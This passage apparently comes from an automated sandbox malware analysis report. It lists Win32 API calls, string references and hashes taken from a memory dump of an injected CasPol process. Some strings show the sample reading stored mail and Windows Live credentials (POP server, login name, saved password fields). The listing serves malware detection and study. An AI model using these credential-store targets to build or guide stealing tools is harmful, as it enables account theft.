                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2881943006-572158859
                                                                                                                                                                                                                    • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                                    • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 888011440-2039793938
                                                                                                                                                                                                                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                    • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                                                      • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                    • String ID: 0wE$d
                                                                                                                                                                                                                    • API String ID: 2915808112-1552800882
                                                                                                                                                                                                                    • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                                    • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                                      • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                                      • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2432066023-0
                                                                                                                                                                                                                    • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                    • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                                                    • Opcode ID: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                                                    • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                                                    • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                    • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_41_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
